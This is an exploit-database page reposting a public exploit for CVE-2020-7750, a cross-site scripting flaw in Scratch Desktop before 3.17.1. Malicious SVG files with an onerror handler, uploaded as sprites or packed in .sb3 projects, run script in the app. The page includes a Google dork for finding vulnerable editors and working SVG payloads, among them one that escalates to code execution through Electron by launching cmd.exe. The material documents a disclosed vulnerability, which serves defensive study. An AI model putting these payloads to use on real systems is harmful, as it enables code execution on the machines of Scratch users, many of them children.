Scratch Desktop 3.17 Code Execution / Cross Site Scripting

CVE Category Price Severity
CVE-2020-7750 CWE-79 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-02
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0521673 0.589474

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Scratch Desktop 3.17 Code Execution / Cross Site Scripting
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted"' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugst
# Vendor Homepage:
# Software Link:
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1:

You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:

<svg xmlns="" xmlns:xlink="">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />

The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.

Example of regular cross-site scripting (XSS):

<svg xmlns="" xmlns:xlink="">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />

The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):

<svg xmlns="" xmlns:xlink="">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />

The example above launches cmd.exe (Command Prompt) on Windows.

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author:

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.